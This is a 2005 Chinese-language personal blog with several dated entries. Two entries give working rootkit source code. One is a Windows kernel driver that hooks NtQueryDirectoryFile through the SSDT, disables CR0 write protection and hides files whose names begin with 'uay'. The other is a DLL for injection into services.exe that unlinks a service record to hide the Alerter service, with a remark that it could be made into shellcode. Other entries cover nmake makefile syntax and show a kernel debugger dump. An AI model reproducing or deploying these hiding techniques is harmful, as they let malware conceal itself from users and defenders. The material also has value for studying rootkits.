2005年09月28日

没啥好说的,很简单hook系统服务NtQueryDirectoryFile

NTSYSAPI
NTSTATUS
NTAPI
ZwQueryDirectoryFile(
      IN HANDLE FileHandle,
      IN HANDLE Event OPTIONAL,
      IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
      IN PVOID ApcContext OPTIONAL,
      OUT PIO_STATUS_BLOCK IoStatusBlock,
      OUT PVOID FileInformation,
      IN ULONG FileInformationLength,
      IN FILE_INFORMATION_CLASS FileInformationClass,
      IN BOOLEAN ReturnSingleEntry,
      IN PUNICODE_STRING FileName OPTIONAL,
      IN BOOLEAN RestartScan
      );
在声明要用到的函数时 NTSYSAPI这个东西不能丢,如果没有这个,就会在文件的IAT中有这么一项,然后调用ZwQueryDirectoryFile的时候,地址就是IAT的地址,执行的是一个jmp  __imp__ZwQueryDirectoryFile,,结果自然就和想的不一样了,应该注意


////////////////////////hookservice.h///////////////////////
typedef struct _SYSTEM_SERVICE_TABLE
{
 /*000*/ ULONG* ServiceTable;           // array of entry points
 /*004*/ LONG*  CounterTable;           // array of usage counters
 /*008*/ LONG   ServiceLimit;           // number of table entries
 /*00C*/ UCHAR   ArgumentTable;          // array of byte counts
 /*010*/ }
 SYSTEM_SERVICE_TABLE,
  * PSYSTEM_SERVICE_TABLE,
  **PPSYSTEM_SERVICE_TABLE;
 
#define SYSTEM_SERVICE_TABLE_ \
 sizeof (SYSTEM_SERVICE_TABLE)
//——————————————————————–
typedef struct _SERVICE_DESCRIPTOR_TABLE
{
 /*000*/ SYSTEM_SERVICE_TABLE ntoskrnl;  // ntoskrnl.exe (native api)
 /*010*/ SYSTEM_SERVICE_TABLE win32k;    // win32k.sys   (gdi/user)
 /*020*/ SYSTEM_SERVICE_TABLE Table3;    // not used
 /*030*/ SYSTEM_SERVICE_TABLE Table4;    // not used
 /*040*/
}
 SERVICE_DESCRIPTOR_TABLE,
   * PSERVICE_DESCRIPTOR_TABLE,
   **PPSERVICE_DESCRIPTOR_TABLE;
  
#define SERVICE_DESCRIPTOR_TABLE_ \
        sizeof (SERVICE_DESCRIPTOR_TABLE)

extern PSERVICE_DESCRIPTOR_TABLE KeServiceDescriptorTable;

//////////////////////////////////////////////////////////////////////
void DriverUnloAd(IN PDRIVER_OBJECT Driver_object);
NTSTATUS DriverDispAtch(IN PDEVICE_OBJECT DeviceObject,
      IN PIRP Irp);
//——————————————————————–
/*
typedef enum _FILE_INFORMATION_CLASS {
  FileDirectoryInformation = 1, // 1 Y N D
  FileFullDirectoryInformation, // 2 Y N D
  FileBothDirectoryInformation, // 3 Y N D
  FileBasicInformation, // 4 Y Y F
  FileStandardInformation, // 5 Y N F
  FileInternalInformation, // 6 Y N F
  FileEaInformation, // 7 Y N F
  FileAccessInformation, // 8 Y N F
  FileNameInformation, // 9 Y N F
  FileRenameInformation, // 10 N Y F
  FileLinkInformation, // 11 N Y F
  FileNamesInformation, // 12 Y N D
  FileDispositionInformation, // 13 N Y F
  FilePositionInformation, // 14 Y Y F
  FileModeInformation = 16, // 16 Y Y F
  FileAlignmentInformation, // 17 Y N F
  FileAllInformation, // 18 Y N F
  FileAllocationInformation, // 19 N Y F
  FileEndOfFileInformation, // 20 N Y F
  FileAlternateNameInformation, // 21 Y N F
  FileStreamInformation, // 22 Y N F
  FilePipeInformation, // 23 Y Y F
  FilePipeLocalInformation, // 24 Y N F
  FilePipeRemoteInformation, // 25 Y Y F
  FileMailslotQueryInformation, // 26 Y N F
  FileMailslotSetInformation, // 27 N Y F
  FileCompressionInformation, // 28 Y N F
  FileObjectIdInformation, // 29 Y Y F
  FileCompletionInformation, // 30 N Y F
  FileMoveClusterInformation, // 31 N Y F
  FileQuotaInformation, // 32 Y Y F
  FileReparsePointInformation, // 33 Y N F
  FileNetworkOpenInformation, // 34 Y N F
  FileAttributeTagInformation, // 35 Y N F
  FileTrackingInformation // 36 N Y F
} FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS;
*/
//——————————————————————–
typedef struct _FILE_BOTH_DIRECTORY_INFORMATION { // Information Class 3
 ULONG NextEntryOffset;
 ULONG Unknown;
 LARGE_INTEGER CreationTime;
 LARGE_INTEGER LastAccessTime;
 LARGE_INTEGER LastWriteTime;
 LARGE_INTEGER ChangeTime;
 LARGE_INTEGER EndOfFile;
 LARGE_INTEGER AllocationSize;
 ULONG FileAttributes;
 ULONG FileNameLength;
 ULONG EaInformationLength;
 UCHAR AlternateNameLength;
 WCHAR AlternateName[12];
 WCHAR FileName[1];
} FILE_BOTH_DIRECTORY_INFORMATION, *PFILE_BOTH_DIRECTORY_INFORMATION;
//——————————————————————–
NTSYSAPI
NTSTATUS
NTAPI
ZwQueryDirectoryFile(
      IN HANDLE FileHandle,
      IN HANDLE Event OPTIONAL,
      IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
      IN PVOID ApcContext OPTIONAL,
      OUT PIO_STATUS_BLOCK IoStatusBlock,
      OUT PVOID FileInformation,
      IN ULONG FileInformationLength,
      IN FILE_INFORMATION_CLASS FileInformationClass,
      IN BOOLEAN ReturnSingleEntry,
      IN PUNICODE_STRING FileName OPTIONAL,
      IN BOOLEAN RestartScan
      );
//——————————————————————–
typedef NTSTATUS (NTAPI *ZWQUERYDIRECTORYFILE)(
  IN HANDLE FileHandle,
  IN HANDLE Event OPTIONAL,
  IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
  IN PVOID ApcContext OPTIONAL,
  OUT PIO_STATUS_BLOCK IoStatusBlock,
  OUT PVOID FileInformation,
  IN ULONG FileInformationLength,
  IN FILE_INFORMATION_CLASS FileInformationClass,
  IN BOOLEAN ReturnSingleEntry,
  IN PUNICODE_STRING FileName OPTIONAL,
  IN BOOLEAN RestartScan
  );
//——————————————————————–
NTSTATUS
NTAPI
myZwQueryDirectoryFile(
      IN HANDLE FileHandle,
      IN HANDLE Event OPTIONAL,
      IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
      IN PVOID ApcContext OPTIONAL,
      OUT PIO_STATUS_BLOCK IoStatusBlock,
      OUT PVOID FileInformation,
      IN ULONG FileInformationLength,
      IN FILE_INFORMATION_CLASS FileInformationClass,
      IN BOOLEAN ReturnSingleEntry,
      IN PUNICODE_STRING FileName OPTIONAL,
      IN BOOLEAN RestartScan
      );
//——————————————————————–


//////////////////hookservice.cpp/////////////////////////////////////
#include <ntddk.h>
#include "hookservice.h"
ZWQUERYDIRECTORYFILE pOldZwQueryDirectoryFile;

NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject,IN PUNICODE_STRING RegistryPath)
{
 DriverObject->MajorFunction[IRP_MJ_CREATE] =
 DriverObject->MajorFunction[IRP_MJ_CLOSE] = DriverDispAtch;
 DriverObject->DriverUnload = DriverUnloAd;

 pOldZwQueryDirectoryFile = (ZWQUERYDIRECTORYFILE)(KeServiceDescriptorTable->ntoskrnl.ServiceTable
         [*(PULONG)((PUCHAR)ZwQueryDirectoryFile+1)]);

 _asm
 {
  CLI //dissable interrupt
  MOV EAX, CR0 //move CR0 register into EAX
  AND EAX, NOT 10000H //disable WP bit
  MOV CR0, EAX //write register back
 }
 
 KeServiceDescriptorTable->ntoskrnl.ServiceTable
         [*(PULONG)((PUCHAR)ZwQueryDirectoryFile+1)] = (ULONG)myZwQueryDirectoryFile;

 
 _asm
 {
  MOV EAX, CR0 //move CR0 register into EAX
  OR EAX, 10000H //enable WP bit
  MOV CR0, EAX //write register back
  STI //enable interrupt
 }

 
 
 return STATUS_SUCCESS;
}
//——————————————————————–
NTSTATUS DriverDispAtch(IN PDEVICE_OBJECT DeviceObject,
      IN PIRP Irp)
{
 Irp->IoStatus.Status = STATUS_SUCCESS;
 IoCompleteRequest(Irp,IO_NO_INCREMENT);
 return STATUS_SUCCESS;
}
//——————————————————————–
void DriverUnloAd(IN PDRIVER_OBJECT Driver_object)
{
 _asm
 {
  CLI //dissable interrupt
  MOV EAX, CR0 //move CR0 register into EAX
  AND EAX, NOT 10000H //disable WP bit
  MOV CR0, EAX //write register back
 }
 
 KeServiceDescriptorTable->ntoskrnl.ServiceTable
         [*(PULONG)((PUCHAR)ZwQueryDirectoryFile+1)] = (ULONG)pOldZwQueryDirectoryFile;
 _asm
 {
  MOV EAX, CR0 //move CR0 register into EAX
  OR EAX, 10000H //enable WP bit
  MOV CR0, EAX //write register back
  STI //enable interrupt
 }
}
//——————————————————————–
NTSTATUS
NTAPI
myZwQueryDirectoryFile(
      IN HANDLE FileHandle,
      IN HANDLE Event OPTIONAL,
      IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
      IN PVOID ApcContext OPTIONAL,
      OUT PIO_STATUS_BLOCK IoStatusBlock,
      OUT PVOID FileInformation,
      IN ULONG FileInformationLength,
      IN FILE_INFORMATION_CLASS FileInformationClass,
      IN BOOLEAN ReturnSingleEntry,
      IN PUNICODE_STRING FileName OPTIONAL,
      IN BOOLEAN RestartScan
      )
{
 NTSTATUS dwStAtus;
 PFILE_BOTH_DIRECTORY_INFORMATION lpInfo;
 /*if (FileInformationClass == FileBothDirectoryInformation){
  return STATUS_NO_SUCH_FILE;
 }*/ //no cAn do this

 DbgPrint("i’m here :>\n");
 dwStAtus = pOldZwQueryDirectoryFile(
  FileHandle,
  Event,
  ApcRoutine,
  ApcContext ,
  IoStatusBlock,
  FileInformation,
  FileInformationLength,
  FileInformationClass,
  ReturnSingleEntry,
  FileName,
  RestartScan
  );
 
 if (FileInformationClass == FileBothDirectoryInformation){
  if (dwStAtus == STATUS_SUCCESS){
    lpInfo = (PFILE_BOTH_DIRECTORY_INFORMATION)FileInformation;
   //DbgPrint("%S\n",lpInfo->FileName);
   
   if (RtlCompareMemory(lpInfo->FileName,L"uay",6) == 6){
    DbgPrint("Blocked file: %S\n",lpInfo->FileName);//debug
    if ((ULONG)(lpInfo->NextEntryOffset) != 0){
     FileInformationLength -= (ULONG)(lpInfo->NextEntryOffset);
     RtlCopyMemory(lpInfo,(PFILE_BOTH_DIRECTORY_INFORMATION)((ULONG)lpInfo + (ULONG)(lpInfo->NextEntryOffset)),FileInformationLength – (((ULONG)lpInfo + (ULONG)(lpInfo->NextEntryOffset))-(ULONG)FileInformation));
    }
    else{
     FileInformationLength -= (ULONG)(lpInfo->NextEntryOffset);
     return dwStAtus;
    }
    //return STATUS_NO_SUCH_FILE;
   }
   do{
    if (RtlCompareMemory(lpInfo->FileName,L"uay",6) == 6){
     DbgPrint("Blocked file: %S\n",lpInfo->FileName);
     if ((ULONG)(lpInfo->NextEntryOffset) != 0){
      FileInformationLength -= (ULONG)(lpInfo->NextEntryOffset);
      RtlCopyMemory(lpInfo,(PFILE_BOTH_DIRECTORY_INFORMATION)((ULONG)lpInfo + (ULONG)(lpInfo->NextEntryOffset)),FileInformationLength – (((ULONG)lpInfo + (ULONG)(lpInfo->NextEntryOffset))-(ULONG)FileInformation));
     }
     else{
      FileInformationLength -= (ULONG)(lpInfo->NextEntryOffset);
      break;
     }
     continue;
     //return STATUS_NO_SUCH_FILE;
    }
    //DbgPrint("%S\n",lpInfo->FileName);
    if (lpInfo->NextEntryOffset != 0){
     lpInfo = (PFILE_BOTH_DIRECTORY_INFORMATION)((ULONG)lpInfo + (ULONG)(lpInfo->NextEntryOffset));
    }
    
    
   }while (lpInfo->NextEntryOffset != 0);
  }
 }


 return dwStAtus;

}
//——————————————————————–

2005年09月26日

2.4.1 make 工具是什么
在DOS 时期编写汇编程序的时候,编译器和链接器基本上不用什么参数,命令只有区
区两条:
Masm xxx.asm;
Link xxx.obj;
只要做个批处理把xxx 换成%1,然后在命令行键入asm.bat xxx 就万事大吉了,很是方
便。Win32 编程就不一样了,不管编译器还是链接器都需要加上必要的选项,文件列表也多
了起来,如链接器的命令行参数中要列出obj,lib,res 和def 等多种文件,又多了资源编译
这一步,如果用批处理实现,要加的参数太多太乱,而每次用手工一行行地键入命令的话,
那对程序员来说简直就是一场灾难。当然,一种简单的解决办法就是为每个编程项目单独建
立一个批处理,每次改动后,运行批处理把所有模块重新编译一次,但是当程序很庞大的时

候,这将花费很长时间,那么该如何处理呢?这时候就要用到make 工具来维护代码了,从
网上下载Win32 汇编的例子程序时,常常发现除了*.asm 和*.rc 文件外,例子文件包中常常
还有一个makefile 文件,这就是给make 工具用的。
make 工具可以看成是一个智能的批处理工具,它本身并没有编译和链接的功能,同样是
用类似于批处理的方式——通过调用用户指定的语句来进行编译和链接。但是,批处理会执
行全部命令将全部源文件编译,包括那些不必重新编译的源文件,而make 工具则可根据目
标文件上一次编译的时间和所依赖的源文件的更新时间自动判断应当编译哪些源文件,对没
有更新过的文件不会处理,这样就可以大大提高程序调试的效率。
举例说明,我们要写一个test.exe 文件,生成最后的可执行文件有4 个步骤:
1. 汇编源文件x.asm,其中用到头文件common.inc,它们经Ml.exe 编译成x.obj;
2. 汇编源文件y.asm,用到头文件common.inc 和y.inc,它们经Ml.exe 编译成y.obj;
3. 资源脚本文件x.rc,经Rc.exe 编译成x.res;
4. 最后用Link 将x.obj,y.obj 和x.res 链接成test.exe。
可以看出,当程序调试的时候,如果修改了x.asm,也就是说x.obj 的文件时间比x.asm
要早,就需要重新进行步骤1 和4;如果修改了y.asm 或y.inc,那么需要重新执行步骤2 和4;
如果修改的是x.rc,则步骤3 和4 必须重新执行;如果修改的是common.inc,因为x.asm 和
y.asm 都和它有关,所以步骤1、2 和4 都要重新执行;如果同时修改了common.inc 和x.rc,
那么必须重复全部步骤。在这个例子中,文件的依赖关系就是:
1. test.exe 依赖于 x.obj,y.obj 和 x.res;
2. x.res 依赖于 x.rc;
3. x.obj 依赖于 x.asm 和 common.inc;
4. y.obj 依赖于 y.asm,common.inc 和 y.inc。
make 可以根据文件的时间正确判断文件的新旧并执行相应的步骤。但make 又是如何知
道文件之间的依赖关系呢?这需要用户用一个描述文件来指定。前面提到的makefile 就是这
个描述文件,执行make 工具的时候,它会默认用makefile 做描述文件名来进行相应的工作,
书写描述文件有规定的语法,虽然语法不是很简单,但写好以后就省事多了。
Microsoft 的make 工具文件名为nmake.exe,它并不是MASM 软件包的一部分,但可以
在Visual C++的Bin 目录下找到。Borland 公司的make 工具文件名是make.exe,它已经包括
在TASM 5.0 工具包中。两者默认的描述文件名都是makefile,描述文件的语法也大同小异,
只是使用时命令行参数有些不同。
2.4.2 nmake 的用法
在命令行键入nmake /? 可以显示帮助信息,nmake 的语法为:
nmake [选项] [/f 描述文件名] [/x 输出信息文件名] [宏定义] [目标]
说明如下:
/f 参数棗如果描述文件名不使用默认的 makefile,可以用/f 参数指定。
/x 参数棗如果想把屏幕输出的信息存到一个文件中,可以用/x 参数指定(用 DOS
下的管道操作符nmake > 文件名的方法无效)。
宏定义 可以用新的定义覆盖描述文件中的宏定义。

目标棗指定建立描述文件中描述的某个文件,如上面的例子中默认是生成最后的
test.exe 文件,也可以用nmake x.res 指定更新x.res 文件。
nmake 常用的选项如表2.8 所示。
表2.8 nmake 的常用选项
选 项 简 介
/A 不检测文件时间,强制更新所有文件
/B 文件时间相等时也要更新文件
/D make 时显示文件新旧信息
/N 显示make 时要执行的命令,但并不真正执行
/P 一个比较有用的选择,make 时显示详细的信息
由于nmake 的应用是基于文件时间的,当计算机的时钟不准确或文件拷贝到另一台计算
机后文件时间有些偏差,那么可能文件的更新会不正确,这时最好用/A 选项强制把所有文件
更新一遍。在平时使用的时候,以makefile 当做建立的描述文件名,那么仅键入不加参数的
nmake 命令就可以完成所有工作了。
2.4.3 描述文件的语法
make 工具最主要也是最基本的功能就是通过描述文件来描述源程序之间的相互关系并
自动维护编译工作,而描述文件需要按照某种语法进行编写,文件中需要说明如何编译各个
源文件并链接生成可执行文件,并要求定义源文件之间的依赖关系,为了更方便使用,文件
中同时可以用一些宏定义。描述文件一般需要包含以下内容:
● 注释
● 宏定义
● 显式规则
● 隐含规则
在这里,首先为2.4.1 节中有关test.exe 的例子写出一个描述文件,再逐步介绍各部分的
书写语法。为了方便使用,一般都把描述文件的文件名取为默认文件名:makefile。这个例子
的makefile 文件如下(注意前面括号里的是行号,不是文件的真正内容):
(001) # nmake 工具的描述文件例子
(002) EXE = Test.exe #指定输出文件
(003) OBJS = x.obj \
(004) y.obj #需要的目标文件
(005) RES = x.res #需要的资源文件
(006)
(007) LINK_FLAG = /subsystem:windows #链接选项
(008) ML_FLAG = /c /coff #编译选项
(009)
(010) #定义依赖关系和执行命令
(011) $(EXE): $(OBJS) $(RES)
(012) Link $(LINK_FLAG) /out:$(EXE) $(OBJS) $(RES)

(013) $(OBJS): Common.inc
(014) y.obj: y.inc
(015)
(016) #定义汇编编译和资源编译的默认规则
(017) .asm.obj:
(018) ml $(ML_FLAG) $<
(019) .rc.res:
(020) rc $<
(021)
(022) #清除临时文件
(023) clean:
(024) del *.obj
(025) del *.res
1. 注释和换行
makefile 中的注释是以#号开头一直到行尾的字符,当nmake 工具处理到这些字符的时
候,它会完全忽略#号及全部注释字符。
当一行的内容过长的时候,可以用换行符来继续,makefile 的换行符是\,如例子中的第
三行和第四行可以合并为:
OBJS = x.obj y.obj #需要的目标文件
在使用换行符的时候要注意在“\”后面不能再加上其他字符,包括注释和空格,否则
nmake 检测到“\”不在一行的最后,就不会把它当成换行符解释,就会出现错误。
2. 宏定义
makefile 中允许使用简单的宏定义指代源文件及其相关编译信息,可以把宏称为变量,
在整个描述文件中,只要符合下面语法的行就是宏定义:
变量名=变量内容
如上面例子文件中的2 到8 就是宏定义,在引用宏时只需在变量前加$符号,但是要注意
的是,如果变量名的长度超过一个字符,在引用时就必须加圆括号(),下面都是有效的宏引
用:
$(LINK_FLAG)
$(EXE)
$A
$(A)
其中最后两个引用是完全一致的。
宏定义的使用可以使makefile 的使用更灵活:首先可以使文件便于修改,比如把第8 行
和第18 行中ml 的选项部分写成宏定义,以后要改变编译选项的时候,只要直接在makefile
文件头部改变宏定义就可以了,不必重新阅读整个makefile 文件;其次,当不止一个地方用到

同一个文件的时候,把文件名定义为宏定义可以减少错误,增加可读性,同时也可以便于
修改;最大的好处是可以直接在命令行中用新的宏定义覆盖,比如在命令行中键入:
nmake ML_FLAG="/c /coff /Fl"
那么这时就会以新的/c /coff /Fl 定义代替makefile 中定义的/c /coff,在这种使用中要注意
两个问题,一是宏名称要区分大小写,ML_FLAG 和ml_flag 是不一样的;二是定义值中有空
格的时候要用双引号引起来,没有空格时可以不用双引号,如ML_FLAG=/c,这使临时使用
不同的参数编译文件时可以不必修改makefile。
3. 显式规则
makefile 中包含有一些规则,这些规则定义了文件之间的依赖关系和产生命令,一个规
则的格式是这样的:
目标文件:依赖文件;命令 (方法1)

目标文件:依赖文件 (方法2)
命令
在规则定义和命令行中,不能包含注释,例子中的第11 和12 行把宏定义展开后就是:
test.exe:x.obj y.obj x.res
Link /subsystem:windows /out:test.exe x.obj y.obj x.res
这里的目标文件就是test.exe,它依赖于3 个文件x.obj,y.obj 和x.res,如果有必要,产
生目标文件的命令就是下面的Link 命令,整个规则可以用两种方法,用第二种方法的时候,
命令可以从第二行开始,第一行的“;”省略,但是这时命令前面必须有一个Tab 字符,否则
nmake 无法区分这究竟是命令还是别的定义。目标文件可以有多个,依赖文件也可以有多个,
同时命令也可以由多个命令行组成,当然这时候就必须用第二种方法定义了。
我们也可以用test.exe 生成的规则定义其他文件,如x.obj 或x.res 的生成方法,但nmake
如何知道哪个是最终要make 的文件呢?实际上nmake 默认将整个描述文件的第一条规则中
的目标文件认为是最终文件,如果我们把11,12 行放到第13 行后面,那么x.obj 和y.obj 的
建立规则就成了第一条规则,nmake 建立了x.obj 和x.obj 之后就不理会test.exe 的建立了,所
以我们必须把最终需要生成的文件放在第一条规则定义。当然,在nmake 的命令行参数中可
以指定要make 的目标,如我们要生成x.res 文件,那么不必修改makefile 将x.res 的描述规则
移动到最前面,而是直接在命令行键入以下命令即可:
nmake x.res
参数中也可以同时带好几个目标文件名,nmake 会一一处理,如果指定的目标文件没有
对应的规则,nmake 会返回一个出错信息:
fatal error U1073: don’t know how to make ‘xxx 文件’
当用户要求nmake 去建造一个目标时,make 会去找到这个目标的依赖规则,这时第二
行中的命令并不会立刻就执行,而是首先要做一些事情:nmake 先去检查依赖文件是否是

另一条规则的目标文件,如果是则先处理这一条规则,否则不是,nmake 再检查各个依赖
文件的时间,看这些文件有没有比目标文件更新的,如果没有,nmake 会决定不再重新建
造目标文件,并给出提示:’xxx 文件’ is up-to-date,如果依赖文件有比目标文件更新的,才
执行命令。
所以一个顺序下来,所有的目标文件以及它们的依赖文件,以及依赖文件的依赖文件都
会被检查并更新,总而言之,一个目标文件的建立包含了顺序正确的指令链接,这个链接结
构是树状的,目标文件是根,一级级扩展到多个文件,我们要求的是nmake 去建立链接中处
于根部的那个文件,nmake 会根据链接结构从目标开始向初始状态前进,最后慢慢回来,在
这个过程中执行建立每个文件所必须的命令,一直到最终目标建立完成。
目标也可以没有依赖文件,而且目标也可以不是一个真正存在的文件,如例子第23 行到
第25 行中的clean 是一个目标,但我们并不是要生成一个clean 文件,而是希望在文件调试
完毕后用nmake 来清除临时文件,当我们键入nmake clean 的时候,工作目录下并没有clean
这个文件,那么nmake 就会去执行clean 定义中的命令,因为nmake 把每一个不存在的目标
当做是一个过时的目标,如此一来,就会删除中间过程中的文件*.obj 和*.res。
指出了目标文件全名的规则称为显式规则,但有些类别的文件的编译方法可以是雷同
的,如从asm 文件产生obj 文件的命令总是用ml,从rc 文件产生res 文件的命令总是用rc,
对于每个文件都写一条规则有些多余,这时候就要用到隐含规则。
4. 隐含规则
隐含规则可以为某一类的文件指出建立的命令,它具体定义了如何将带一个特定扩展名
的文件转换成具有另一种扩展名的文件,定义的格式是:
.源扩展名.目标扩展名:;命令 (方法1)

.源扩展名.目标扩展名: (方法2)
命令
隐含规则的语法和显式规则相似,也是用“:”隔开,在“;”下面书写命令,也可以不
用“;”而将命令写在第二行,同理,这时命令之前要加一个Tab 字符。
隐含规则不能有依赖文件,所以“:”下面没有内容,例子中的第17、18 行定义了从asm
文件建立obj 文件的隐含规则,第19 和20 行定义了从rc 文件建立res 文件的隐含规则,隐
含规则中无法指定确定的输入文件名,因为输入文件名是泛指的有相同扩展名的一整类文
件,这时候就要用到几个特殊的内定宏来指定文件名,这些宏是$@,$*,$?和$<,它们的含
义如下:
$@ —— 全路径的目标文件。
$* —— 除去扩展名的全路径的目标文件。
$? —— 所有源文件名。
$< —— 源文件名(只能用在隐含规则中)。
所以第19、20 行中的rc $< 用于x.rc 的时候就是rc x.rc。
读者可以注意到一些显式规则没有命令行,如第13 行的“$(OBJS): Common.inc”指出
了所有的obj 文件全部依赖于Common.inc 文件,第14 行的“y.obj: y.inc”则指出了y.obj 同

时也依赖于y.inc 和第13 行的规则合并,y.obj 依赖于Common.inc 也依赖于y.inc,但是这两
条规则都没有指出产生这些obj 文件的命令,所以nmake 处理的时候会到隐含规则中去找命
令行,最后会用第18 行的“ml $(ML_FLAG) $<”命令去产生这些obj 文件。

2005年09月23日

已经是23日了,,,
 不能片刻停留,草草的记到blog上
9月16-17是让我难忘记的日子,,,,,,,,,失去了我的最亲密的伙伴

管理工具中的"服务"里可以查看到服务,hook了ZwOpenKey也不能阻止显示出服务来,只能是让对服务不能操作,但达不到隐藏的效果,,后来在国外的一篇文章上看到说是在services.exe中有个service的dAtAbAse,结构在nt4下找到的是
//================
// SERVICE_RECORD
//================
// Dependency information:
//    StartDepend is a linked list of services and groups that must be
//        started first before this service can start.
//    StopDepend is a linked list of services and groups that must be
//        stopped first before this service can stop.
//    Dependencies is a string read in from the registry.  Deleted when
//      the info has been converted to a StartDepend list.
//
// BUGBUG: Security decriptor is temporarily stored here until
// we are able to write it to the registry
//
// StartError:
// Error encountered by service controller when starting a service.
// This is distinguished from error posted by the service itself in
// the exitcode field.
//
// StartState:
// SC managed service state which is distinguished from the service
// current state to enable correct handling of start dependencies.
//
// Load order group information:
//
//     MemberOfGroup is a pointer to a load order group which this service
//         is currently a member of.  This value is set to NULL if this
//         service does not belong to a group.  A non-NULL pointer could
//         point to a group entry in either the order group or standalone
//         group list.
//
//     RegistryGroup is a pointer to a group which we have recorded in the
//         registry as the group this service belongs to.  This is not the
//         same as MemberOfGroup whenever the service is running and the
//         load order group of the service has been changed
//
typedef struct _SERVICE_RECORD {
    struct _SERVICE_RECORD  *Prev;          // linked list
    struct _SERVICE_RECORD  *Next;          // linked list
    LPWSTR                  ServiceName;    // points to service name
    LPWSTR                  DisplayName;    // points to display name
    DWORD                   ResumeNum;      // Ordered number for this rec
    DWORD                   ServerAnnounce; // Server announcement bit flags
    DWORD                   Signature;      // Identifies this as a service record.
    DWORD                   UseCount;       // How many open handles to service
    DWORD                   StatusFlag;     // status(delete,update…)
    union {
        LPIMAGE_RECORD      ImageRecord;    // Points to image record
        LPWSTR              ObjectName;     // Points to driver object name
    };
    SERVICE_STATUS          ServiceStatus;  // see winsvc.h
    DWORD                   StartType;      // AUTO, DEMAND, etc.
    DWORD                   ErrorControl;   // NORMAL, SEVERE, etc.
    DWORD                   Tag;            // DWORD Id for the service,0=none.
    LPDEPEND_RECORD         StartDepend;
    LPDEPEND_RECORD         StopDepend;
    LPWSTR                  Dependencies;
    PSECURITY_DESCRIPTOR    ServiceSd;
    DWORD                   StartError;
    DWORD                   StartState;
    LPLOAD_ORDER_GROUP      MemberOfGroup;
    LPLOAD_ORDER_GROUP      RegistryGroup;
} SERVICE_RECORD, *PSERVICE_RECORD, *LPSERVICE_RECORD;

不知道现在改变了多少,实现隐藏,就是在services.exe的进程空间里搜到要隐藏的服务名对应的字符串,比如Alerter,找到后再找引用这个地址的地方,就是一个_SERVICE_RECORD,对应的就是LPWSTR                  ServiceName;    // points to service name,为了确认下,可以把地址+4后看是否指向另一个字符串LPWSTR                  DisplayName;    // points to display name,和要隐藏的服务的显示的名称做比较,如果是,就证明这个地方的确是个_SERVICE_RECORD结构,,把这个结构从链上摘掉,所以只用到_SERVICE_RECORD的前4个成员,通过softice看,前4个没变化,,所以弄出个替代的结构
typedef struct _FAKE_SERVICE_RECORD {
    struct _FAKE_SERVICE_RECORD  *Prev;          // linked list
    struct _FAKE_SERVICE_RECORD  *Next;          // linked list
    LPWSTR                  ServiceName;    // points to service name
    LPWSTR                  DisplayName;    //
} FAKE_SERVICE_RECORD, *PFAKE_SERVICE_RECORD, *LPFAKE_SERVICE_RECORD;


程序在下面,,,做为一个dll注入到services.exe中,搜索的范围有点大,其实每次的位置都基本是固定的,,在其他的版本上没试过.
可以弄成shellcode注入进去,省了个dll


//////////////////////////////seArchDLL.cpp///////////////////////
#include <stdio.h>
#include <windows.h>
#include <string.h>

typedef struct _FAKE_SERVICE_RECORD {
    struct _FAKE_SERVICE_RECORD  *Prev;          // linked list
    struct _FAKE_SERVICE_RECORD  *Next;          // linked list
    LPWSTR                  ServiceName;    // points to service name
    LPWSTR                  DisplayName;    //
} FAKE_SERVICE_RECORD, *PFAKE_SERVICE_RECORD, *LPFAKE_SERVICE_RECORD;

void seArchDWORD(int Addr);
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReAson,LPVOID lpvReserved)
{
 switch (fdwReAson){
  
 case DLL_PROCESS_ATTACH:
  {  
   FILE* pFile;
   pFile = fopen("c:\\seArch.txt","a+");
   fputs("begin\n",pFile);
   fclose(pFile);
   int i;
   for (i = 0×300000;i<0×5000000;i+=4){
    printf("%x\n",i);
    __try{
     if (0 == wcscmp((const unsigned short *)i,L"Alerter")){
      char temp [32];
      sprintf(temp,"found Alerter At: %x\n",i);
      FILE* pFile;
      pFile = fopen("c:\\seArch.txt","a+");
      fputs(temp,pFile);
      fclose(pFile);
      seArchDWORD(i);
      //break;
     }
    }
    __except(EXCEPTION_EXECUTE_HANDLER ){
     printf("error\n");
     i-=4;
     i += 0×1000;
     //_getche();
    }
   }


  }
 case DLL_THREAD_ATTACH:
  break;
 case DLL_THREAD_DETACH:
  break;
 case DLL_PROCESS_DETACH:
  break;
 }
 return TRUE;
}
//——————————————————————–
void seArchDWORD(int Addr)
{
 int i;
 for (i = 0×300000;i<0×5000000;i+=4){
  printf("%x\n",i);
  __try{
   if (Addr == *(ULONG*)i){
    char temp [32];
    sprintf(temp,"found the point At: %x\n",i);
    FILE* pFile;
    pFile = fopen("c:\\seArch.txt","a+");
    fputs(temp,pFile);
    fputws((const unsigned short *)(*(ULONG*)(i+4)),pFile);
    fputs("\n",pFile);
    fclose(pFile);
    //break;
    if (0 == wcscmp((const unsigned short *)(*(ULONG*)(i+4)),L"Alerter")){
     //found the right one
     PFAKE_SERVICE_RECORD pRecord;
     pRecord = (PFAKE_SERVICE_RECORD)(i-8);
     *((DWORD*)pRecord->Prev+1) = (DWORD)(pRecord->Next);
     *((DWORD*)pRecord->Next) = (DWORD)(pRecord->Prev);
     }
   }
  }
  __except(EXCEPTION_EXECUTE_HANDLER ){
   printf("error\n");
   i-=4;
   i += 0×1000;
   //_getche();
  }
 }
 
}
//——————————————————————–

2005年09月15日

kd> !process 80d7a930-0×1b0
PROCESS 80d7a780  SessionId: 0  Cid: 0264    Peb: 7ffdf000  ParentCid: 0224
    DirBase: 06a33000  ObjectTable: e15edcf0  HandleCount:  20.
    Image: savedump.exe
    VadRoot 80dbfb98 Vads 40 Clone 0 Private 78. Modified 0. Locked 0.
    DeviceMap e10000d8
    Token                             e15dbd38
    ElapsedTime                       00:04:14.656
    UserTime                          00:00:00.015
    KernelTime                        00:00:00.109
    QuotaPoolUsage[PagedPool]         15352
    QuotaPoolUsage[NonPagedPool]      1600
    Working Set Sizes (now,min,max)  (372, 50, 345) (1488KB, 200KB, 1380KB)
    PeakWorkingSetSize                408
    VirtualSize                       12 Mb
    PeakVirtualSize                   15 Mb
    PageFaultCount                    440
    MemoryPriority                    BACKGROUND
    BasePriority                      4
